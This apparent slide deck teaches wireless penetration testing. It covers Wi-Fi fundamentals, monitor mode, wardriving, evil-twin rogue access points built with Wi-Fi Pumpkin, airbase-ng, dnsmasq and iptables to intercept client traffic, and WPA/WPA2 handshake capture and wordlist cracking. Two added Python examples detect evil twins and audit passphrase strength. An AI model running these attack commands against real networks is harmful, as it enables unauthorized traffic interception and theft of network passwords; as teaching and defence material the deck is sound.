In this slide deck we look at the requirements for wireless penetration testing (hardware and software) and the various IEEE standards, and then dive into WEP, WPA and WPA2, their security threats, and security best practices.
4. Hardware of my choice for this session:
TL-WN722N Wi-Fi Adaptor
5. System Architecture
• Minimum System Configuration
• Windows 10 in Host Machine
• Machine Specification: 4GB to 8GB RAM, 100GB HDD or SSD, 2CPU
• Virtualisation Platform
• VirtualBox (https://www.virtualbox.org/)
(or)
• VMware (https://www.vmware.com/in/products/workstation-player/workstation-player-evaluation.html)
• OS needs to be installed inside VM
• Kali Linux (https://www.kali.org/get-kali/#kali-platforms)
7. Wi-Fi Network Fundamentals
IEEE 802.11
• IEEE 802.11 is part of the IEEE 802 set of local area network (LAN)
technical standards, and specifies the set of media access control (MAC)
and physical layer (PHY) protocols for implementing wireless local area
network (WLAN) computer communication.
• The standard and amendments provide the basis for wireless network
products using the Wi-Fi brand and are the world's most widely used
wireless computer networking standards.
• IEEE 802.11 is used in most home and office networks to allow laptops,
printers, smartphones, and other devices to communicate with each other
and access the Internet without connecting wires. IEEE 802.11 is also a
basis for vehicle-based communication networks with IEEE 802.11p.
8. IEEE 802.11 (Contd.)
• The standards are created and maintained by the Institute of Electrical and
Electronics Engineers (IEEE) LAN/MAN Standards Committee (IEEE 802).
• The base version of the standard was released in 1997 and has had subsequent
amendments. While each amendment is officially revoked when it is incorporated
in the latest version of the standard, the corporate world tends to market to the
revisions because they concisely denote the capabilities of their products.
• IEEE 802.11 uses various frequencies including, but not limited to, 2.4 GHz,
5 GHz, 6 GHz, and 60 GHz frequency bands. Although IEEE 802.11 specifications
list channels that might be used, the radio frequency spectrum availability
allowed varies significantly by regulatory domain.
• The protocols are typically used in conjunction with IEEE 802.2, and are designed
to interwork seamlessly with Ethernet, and are very often used to carry Internet
Protocol traffic.
14. Basic Terminologies (Contd.)
Access Point (AP)
• AP is a networking hardware device that allows other Wi-Fi devices to
connect to a wired network.
• As a standalone device, the AP may have a wired connection to a router,
but, in a wireless router, it can also be an integral component of the router
itself.
Service Set Identifier (SSID)
• A service set identifier (SSID) is a sequence of characters that uniquely
names a wireless local area network (WLAN).
• An SSID is sometimes referred to as a "network name". This name allows
stations to connect to the desired network when multiple independent
networks operate in the same physical area.
15. Basic Terminologies (Contd.)
Basic Service Set Identifier (BSSID)
• It is the MAC (physical) address of the access point or wireless router
that is used to connect to the Wi-Fi.
Extended Service Set Identifier (ESSID)
• It is a wireless network, created by multiple access points, which appears
to users as a single, seamless network, such as a network covering a home
or office that is too large for reliable coverage by a single access point.
Roaming
• Wi-Fi roaming occurs when a wireless client device moves outside the
usable range of one router or access point (AP) and connects to a
different one.
16. Basic Terminologies (Contd.)
Channel
• A Wi-Fi channel is the frequency at which your router sends out the
information to your device. Most routers and devices support several
bands for your Wi-Fi connection, most popular being 5 GHz and 2.4 GHz.
Each of these ranges gets divided into smaller slots that are channels.
Data Rate
• Data rates vary with the modulation type and the number of spatial streams;
typical values are 200 Mbps, 400 Mbps, 433 Mbps, 600 Mbps and 867 Mbps.
Beacon
• Wi-Fi beacons are relatively short, regular transmissions from access
points (APs) whose purpose is to inform user devices (clients) about
available Wi-Fi services and nearby access points. Clients use beacons to
decide which AP to connect to.
18. Wireless Operating modes (Contd.)
• Managed - Managed mode allows you to configure your laptop or desktop
system as an AP for providing connectivity to other wireless stations.
• Ad-hoc - Ad-hoc mode refers to a wireless network structure where
devices can communicate directly with each other. This type of wireless
network is also called peer-to-peer mode.
• Master - When your wireless card is in master mode it acts as an access
point and actively transmits a signal.
• Monitor - Monitor mode, or RFMON (Radio Frequency MONitor) mode,
allows a computer with a wireless network interface controller (WNIC) to
monitor all traffic received on a wireless channel.
• Auto - The easiest way to configure a wireless interface; it is enabled by
default.
20. Monitor Mode
• Start the Kali OS in VMware or Virtual box
• Plug in the USB TP-Link wireless adapter (TL-WN722N)
• Run the following command
• iwconfig
21. Monitor Mode (Contd.)
• By default it will be in Auto or Managed mode
• Run the following commands to switch to Monitor mode
• airmon-ng start wlan0
• airmon-ng check kill [if any previous processes are running, do this]
• iwconfig
• To disable monitor mode, run airmon-ng stop wlan0
• Restart the network manager: service network-manager start
35. Wardriving with Kismet (Just for reference)
• This can be achieved only if we are moving, driving or roaming in a
vehicle through multiple locations to capture Wi-Fi hotspots with GPS
information.
• Hardware required - Car, laptop, Android phone, Wi-Fi adapter
• Software required - Kismet, GPSD, ADB, Share GPS (Android app),
Google Earth
• Reference blog link - https://veteransec.org/wifi-hacking-wardriving-with-an-android-phone-and-raspberry-pi-3/
39. Creation of Rogue AP using Wi-Fi Pumpkin 3
• Plug in the wireless adapter; monitor mode does not need to be enabled.
Run the following commands
• wifipumpkin3
• set interface wlan0
• set ssid hello
• set proxy noproxy
• start
• It will create a rogue AP named Hello
40. Creation of Rogue AP using Wi-Fi Pumpkin 3
(Contd.)
• Once any device connects to the rogue AP "Hello", the traffic of the
connected clients can be intercepted easily. (Evil Twin attack)
41. Creation of Rogue AP using Air-ng tools
• airodump-ng wlan0
• airbase-ng -c 11 -e tplink -s -W 1 wlan0
• airodump-ng -c 11 --bssid bssidoftplinknewlycreated -w 1 wlan0
• For an Evil Twin/MITM attack we need dnsmasq
• airbase-ng -e TP-Link -c 8 wlan0 [create the fake AP for the Evil Twin attack]
• The at0 interface is created
geany /etc/dnsmasq.conf
interface=at0
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
42. Creation of Rogue AP using Air-ng tools
(Contd.)
Run the commands below in a separate terminal
• ifconfig at0 up
• ifconfig at0 10.0.0.1 netmask 255.255.255.0
• route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
• iptables -P FORWARD ACCEPT
• iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
• echo '1' > /proc/sys/net/ipv4/ip_forward
• dnsmasq -C /etc/dnsmasq.conf -d
• Connect any device now; its traffic can be seen
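As an added example that is not part of the slides, the CSV that an airodump-ng "-w" capture writes can be screened for evil twins like the rogue APs above: an SSID advertised by a BSSID that is not in the site's AP inventory, or by an open network cloning an encrypted SSID. The CSV rows and the KNOWN_APS inventory are constructed sample data; parse_airodump_aps and find_evil_twins are hypothetical helper names.

```python
import csv
import io

# Constructed sample in airodump-ng's CSV layout (AP table only), standing in for
# the "-w" capture on the rogue-AP slides. "TPLink_Home" is advertised by the real
# WPA2 AP and by a second, open radio with a different vendor prefix (the evil twin).
SAMPLE_AIRODUMP_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
50:C7:BF:11:22:33, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6, 54, WPA2, CCMP, PSK, -40, 120, 0,   0.  0.  0.  0, 11, TPLink_Home,
00:11:22:AA:BB:CC, 2024-01-01 10:03:00, 2024-01-01 10:05:00, 11, 54, OPN ,     ,    , -35,  60, 0,   0.  0.  0.  0, 11, TPLink_Home,
50:C7:BF:44:55:66, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1, 54, WPA2, CCMP, PSK, -60, 110, 0,   0.  0.  0.  0,  9, Guest_Net,
"""
# Assumed (hypothetical) inventory of the APs the site actually owns.
KNOWN_APS = {"TPLink_Home": {"50:C7:BF:11:22:33"}, "Guest_Net": {"50:C7:BF:44:55:66"}}

def parse_airodump_aps(csv_text):
    """One dict per AP row: BSSID, channel, privacy (OPN/WEP/WPA/WPA2), ESSID."""
    aps = []
    for row in csv.reader(io.StringIO(csv_text), skipinitialspace=True):
        if len(row) < 14 or row[0].strip() in ("", "BSSID", "Station MAC"):
            continue  # blank line, AP header, or the client table
        aps.append({"bssid": row[0].strip().upper(), "channel": row[3].strip(),
                    "privacy": row[5].strip(), "essid": row[13].strip()})
    return aps

def find_evil_twins(csv_text, known_aps):
    """Flag BSSIDs that advertise a known SSID but are not in the inventory, or
    that offer an open network under an SSID that is otherwise encrypted."""
    by_essid = {}
    for ap in parse_airodump_aps(csv_text):
        by_essid.setdefault(ap["essid"], []).append(ap)
    alerts = []
    for essid, group in by_essid.items():
        encrypted_elsewhere = any(ap["privacy"] != "OPN" for ap in group)
        for ap in group:
            reasons = []
            if essid in known_aps and ap["bssid"] not in known_aps[essid]:
                reasons.append("BSSID not in inventory")
            if encrypted_elsewhere and ap["privacy"] == "OPN":
                reasons.append("open network cloning an encrypted SSID")
            if reasons:
                alerts.append((essid, ap["bssid"], ap["channel"], reasons))
    return alerts

if __name__ == "__main__":
    for essid, bssid, chan, why in find_evil_twins(SAMPLE_AIRODUMP_CSV, KNOWN_APS):
        print(f"ALERT: {essid!r} from {bssid} on channel {chan}: {'; '.join(why)}")
```

Without an inventory the open-clone heuristic still fires, so the check is useful even on an ad-hoc survey.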
54. Capture the WPA/WPA2 Handshake file
• Run the following commands:
• airmon-ng start wlan0 [put the wireless adapter in monitor mode]
• airodump-ng wlan0 [listen to all the APs that are alive]
• airodump-ng -c 6 --bssid macaddrwpaAP -w wpacracking wlan0 [capture the
handshake into the wpacracking file with airodump-ng]
• Perform the deauthentication manually by disconnecting and reconnecting your
mobile device to that AP
• aircrack-ng wpacracking-01.cap -w /usr/share/dict/wordlist-probable.txt
[pass the wordlist together with the handshake file]
56. Cracking WPA/WPA2 using John the Ripper
• john --wordlist=/usr/share/dict/wordlist-probable.txt --rules --stdout | aircrack-ng -e tplink -w - wpacracking.cap
57. Cracking WPA/WPA2 using Wifite
• wifite --wpa
• Before starting the attack, connect a client device to the target AP
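An added example, not from the slides, showing why the wordlist runs on the handshake, John and Wifite slides succeed against dictionary passphrases: WPA/WPA2-Personal derives the PMK with PBKDF2-HMAC-SHA1 over the passphrase salted with the SSID, so each guess costs 4096 SHA-1 rounds and a passphrase present in the wordlist falls while one outside it does not. The derivation is checked against the IEEE 802.11 test vector; SAMPLE_WORDLIST is constructed, and derive_pmk and audit_psk are hypothetical names for a self-check of your own network's key.

```python
import hashlib

# Constructed mini wordlist standing in for /usr/share/dict/wordlist-probable.txt.
SAMPLE_WORDLIST = ["password", "12345678", "tplink123", "letmein1"]

# IEEE 802.11 Annex H test vector: passphrase "password", SSID "IEEE".
IEEE_VECTOR_PMK = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The SSID is the salt, so the same passphrase yields a different PMK on every
    network, which is why precomputed PMK tables are only useful per SSID."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, dklen=32)


def audit_psk(passphrase: str, ssid: str, wordlist) -> bool:
    """Hypothetical self-check: True if the network's PMK equals the PMK of any
    wordlist entry, i.e. the aircrack-ng/John run above would recover the key.
    Each candidate costs one PBKDF2 derivation, exactly what it costs an attacker."""
    target = derive_pmk(passphrase, ssid)
    return any(derive_pmk(word, ssid) == target for word in wordlist)


if __name__ == "__main__":
    assert derive_pmk("password", "IEEE").hex() == IEEE_VECTOR_PMK
    for psk in ("tplink123", "correct horse battery staple 7"):
        weak = audit_psk(psk, "tplink", SAMPLE_WORDLIST)
        print(f"SSID tplink, passphrase {psk!r}: {'WOULD FALL to the wordlist' if weak else 'not in wordlist'}")
    # Same passphrase, different SSID, different PMK: the SSID acts as the salt.
    print(derive_pmk("password", "IEEE") != derive_pmk("password", "tplink"))
```

A long random passphrase on a non-default SSID is the practical defence this demonstrates, which is what the best-practice slide's "change default passwords" and "protect your SSID" items amount to.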
61. Security Best Practices
• Change default passwords
• Restrict access to authorized users
• Encrypt the data on your network
• Protect your Service Set Identifier (SSID)
• Install a firewall
• Maintain antivirus software
• Use file sharing with caution
• Keep your access point software patched and up to date
• Check your internet provider’s or router manufacturer’s wireless security options
• Connect using a Virtual Private Network (VPN)
Reference blog link - https://www.cisa.gov/uscert/ncas/tips/ST05-003